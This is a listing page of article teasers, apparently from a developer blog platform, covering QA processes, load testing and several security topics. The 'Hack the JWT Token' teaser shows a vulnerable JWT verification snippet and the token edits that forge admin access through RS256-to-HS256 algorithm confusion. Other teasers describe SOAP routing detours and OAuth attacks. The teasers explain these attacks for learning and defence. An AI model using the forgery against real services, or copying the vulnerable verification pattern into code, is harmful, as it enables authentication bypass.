• QA process at Miro

      We have been working on our current QA process for about two years, and we still keep improving it. This process may seem obvious, but when we started to implement it in a new team that consisted entirely of new developers, we realized that it was difficult to do right away. Many people are used to working differently and need to make a lot of changes at once to switch, which is difficult. At the same time, it is ill-advised to implement this process in parts, because it can negatively affect the quality.

      What do we do? We need to do preliminary preparation for each block of the development process: task decomposition, evaluation and planning, development itself, investigative testing, and release. This preparation does not consist of simply throwing old parts out of the process but of their adequate replacement, which increases quality.

      In this article, I will talk in detail about our testing process at each stage of creating a new feature and also about the introduced changes that have increased the quality and speed of development.

      image
      Read more →
    • Managing hundreds of servers for load testing: autoscaling, custom monitoring, DevOps culture

        In the previous article, I talked about our load testing infrastructure. On average, we use about 100 servers to create a load, about 150 servers to run our service. All these servers need to be created, configured, started, deleted. To do this, we use the same tools as in the production environment to reduce the amount of manual work:

        • Terraform scripts for creating and deleting a test environment;
        • Ansible scripts for configuring, updating, starting servers;
        • In-house Python scripts for dynamic scaling, depending on the load.

        Thanks to the Terraform and Ansible scripts, all operations ranging from creating instances to starting servers are performed with only six commands:

        #launch the required instances in the AWS console
        ansible-playbook deploy-config.yml #update servers versions
        ansible-playbook start-application.yml #start our app on these servers
        ansible-playbook update-test-scenario.yml --ask-vault-pass #update the JMeter test scenario if it was changed
        infrastructure-aws-cluster/jmeter_clients:~# terraform apply #create JMeter servers for creating the load
        playbook start-jmeter-server-cluster.yml #start the JMeter cluster
        ansible-playbook start-stress-test.yml #start the test
        

        Read more →
      • Reliable load testing with regards to unexpected nuances

          We thought about building the infrastructure for large load tests a year ago when we reached the mark of 12,000 simultaneously active online users. In three months, we made the first version of the test, which showed us the limits of the service.

          The irony is that simultaneously with the launch of the test, we reached the limits on the production server, resulting in two-hour service downtime. This further encouraged us to move from making occasional tests to establishing an effective load testing infrastructure. By infrastructure, I mean all tools for working with load testing: tools for launching the test (manual and automatic), the cluster that creates the load, a production-like cluster, metrics and reporting services, scaling services, and the code to manage it all.

          image

          Simplified, this is what our structure looks like: a collection of different servers that somehow interact with each other, each server performing specific tasks. It seemed that to build the load testing infrastructure, it was enough for us to make this diagram, take account of all interactions, and start creating test cases for each block one by one.

          This approach is right, but it would have taken many months, which was not suitable for us because of our rapid growth — over the past twelve months, we have grown from 12,000 to 100,000 simultaneously active online users. Also, we didn’t know how our service infrastructure would respond to the increased load: which blocks would become the bottleneck, and which would scale linearly?
          Read more →
        • Are my open-source libraries vulnerable? (2 min reading to make your life more secure)

            The explosion of open source and issues related to it


            The amount of open source or other third party code used in a software project is estimated as 60-90% of a codebase. Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defences and enable a range of possible attacks and impacts.



            Conclusion: even if you perform constant security code reviews, you still might be vulnerable because of third-party components.

            Some have tried to do this manually, but the sheer amount of work and data is growing and is time consuming, difficult, and error prone to manage. It would require several full time employees and skilled security analysts to constantly monitor all sources to stay on top.
            Read more →
          • AdBlock has stolen the banner, but banners are not teeth — they will be back

            More
            Ads
          • V&V not for vendetta



              Over the past six years, I have worked on developing and acceptance testing of the applications for conducting and supporting clinical trials. Applications of various sizes and complexity, big data, a huge number of visualizations and views, data warehousing, ETL, etc. The products are used by doctors, clinical trials management and people who are involved in the control and monitoring of research.

              For the applications that have or can have a direct impact on the life and health of patients, a formal acceptance testing process is required. Acceptance test results along with the rest of the documentation package are submitted for audit to the FDA (Food and Drug Administration, USA). The FDA authorizes the use of the application as a tool for monitoring and conducting clinical trials. In total, my team has developed, tested and sent to the production more than thirty applications. In this article, I will briefly talk about acceptance testing and improvement of tools used for it.

              Note: I do not pretend to be the ultimate truth and completely understand that most of what I write about is a Captain Obvious monologue. But I hope that the described can be useful to both the entry level and the teams that encounter this in everyday work, or at least it may make happy those who have simpler processes.
              Read more →
            • SOAP Routing Detours Vulnerability

                Description


                The WS-Routing Protocol is a protocol for exchanging SOAP messages from an initial message sender to receiver, typically via a set of intermediaries. The WS-Routing protocol is implemented as a SOAP extension, and is embedded in the SOAP Header. WS-Routing is often used to provide a way to direct XML traffic through complex environments and transactions by allowing interim way stations in the XML path to assign routing instructions to an XML document.

                Taking a minimalist approach, WS-Routing encapsulates a message path within a SOAP message, so that the message contains enough information to be sent across the Internet using transports like TCP and UDP while supporting:

                • The SOAP message path model,
                • Full-duplex, one-way message patterns,
                • Full-duplex, request-response message patterns, and
                • Message correlation.

                Routing Detours are a type of «Man in the Middle» attack where Intermediaries can be injected or «hijacked» to route sensitive messages to an outside location. Routing information (either in the HTTP header or in WS-Routing header) can be modified en route and traces of the routing can be removed from the header and message such that the receiving application none the wiser that a routing detour has occurred. 
                Read more →
              • Testing SQL Server code with tSQLt

                  FYI: this article is an expanded version of my talk at SQA Days #25.

                  Based on my experience with colleagues, I can state: DB code testing is not a widely spread practice. This can be potentially dangerous. DB logic is written by human beings just like all other «usual» code. So, there can be failures which can cause negative consequences for a product, business or users. Whether these are stored procedures helping backend or it is ETL modifying data in a warehouse — there is always a risk and testing helps to decrease it. I want to tell you what tSQLt is and how it helps us to test DB code.

                  Read more →
                • How to Make Emails and Not Mess Up: Practical Tips

                  • Tutorial


                  A developer, who first encountered generating emails, has almost no chance to write an application, that will do it correctly. Around 40% of emails, generated by corporate applications, are violating some form of standard, and due to this, there are problems with delivery and display. There are reasons for this: emails are technically more difficult than the web, and operating emails is regulated by a few hundred standards, as well as an uncountable number of generally accepted (and not as much) practices, whereas the email clients are more varied and unpredictable than browsers. Testing may significantly improve the situation, but materials that are dedicated to testing the email system, are practically non-existent.

                  Mail.ru regularly interacts with its users by email. In our projects, all the components responsible for generating emails and even individual mailings, are subject to mandatory testing. In this article, we will share our experience (learning from our mistakes).
                  Read more →
                • Quality as Team's responsibility. Our QA experience

                  Disclaimer: This is a translation of an article. All rights belongs to author of original article and Miro company.


                  I'm a QA Engineer in Miro. Let me tell about our experiment of transferring partially testing tasks to developers and of transforming Test Engineer role into QA (Quality assurance).


                  First briefly about our development process. We have daily releases for client side and 3 to 5 weekly releases of server side. Team have 60+ people spitted onto 10 Functional Scrum Teams.


                  I'm working in Integration team. Our tasks are:


                  • Integration of our service into external products
                  • Integration of external products into our service
                    For example we have integrated Jira. Jira Cards — visual representation of tasks so it's useful to work with tasks not opening Jira at all.

                    image

                  How the experiment starts


                  All starts with trivial issue. When someone of Test Engineers had sick leave then team performance was degraded significantly. Team was continued working on tasks. However when code was reached testing phase task was hold on. As a result new functionality didn't reach production in time.


                  Going onto vacation by Test Engineer is a more complex story. He/she needs to find another Test Engineer who ready to take extra tasks and conduct knowledge sharing. Going onto vacation by two Test Engineers at the sane time is not an applicable luxury.

                  Read more →
                • Hack the JWT Token

                  • Tutorial

                  For Educational Purposes Only! Intended for Hackers Penetration testers.

                  Issue


                  The algorithm HS256 uses the secret key to sign and verify each message. The algorithm RS256 uses the private key to sign the message and uses the public key for authentication.

                  If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature. Asymmetric Cipher Algorithm => Symmetric Cipher Algorithm.

                  Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data.
                  The backend code uses the RSA public key + HS256 algorithm for signature verification.

                  Example


                  Vulnerability appear when client side validation looks like this:

                  const decoded = jwt.verify(
                     token,
                     publickRSAKey,
                     { algorithms: ['HS256'  , 'RS256'] }          //accepted both algorithms 
                  )

                  Lets assume we have initial token like presented below and " => " will explain modification that attacker can make:

                  //header 
                  {
                  alg: 'RS256'                         =>  'HS256'
                  }
                  //payload
                  {
                  sub: '123',
                  name: 'Oleh Khomiak',
                  admin: 'false'                       => 'true'
                  }

                  The backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
                  Read more →
                • The most common OAuth 2.0 Hacks

                    OAuth 2 overview


                    This article assumes that readers are familiar with OAuth 2. However, below a brief description of it is presented below.



                    1. The application requests authorization to access service resources from the user. The application needs to provide the client ID, client secret, redirect URI and the required scopes.
                    2. If the user authorizes the request, the application receives an authorization grant
                    3. The application requests an access token from the authorization server by presenting authentication of its own identity, and the authorization grant
                    4. If the application identity is authenticated and the authorization grant is valid, the authorization server issues the access and refresh (if required) token to the application. Authorization is complete.
                    5. The application requests the resource from the resource server and presents the access token for authentication
                    6. If the access token is valid, the resource server serves the resource to the application

                    The are some main Pros and Cons in OAuth 2.0


                    • OAuth 2.0 is easier to use and implement (compared to OAuth 1.0)
                    • Wide spread and continuing growing
                    • Short lived Tokens
                    • Encapsulated Tokens

                    — No signature (relies solely on SSL/TLS ), Bearer Tokens
                    — No built-in security
                    — Can be dangerous if used from not experienced people
                    — Too many compromises. Working group did not make clear decisions
                    — Mobile integration (web views)
                    — Oauth 2.0 spec is not a protocol, it is rather a framework — RFC 6749

                    Read more →
                    • +16
                    • 24.1k
                    • 2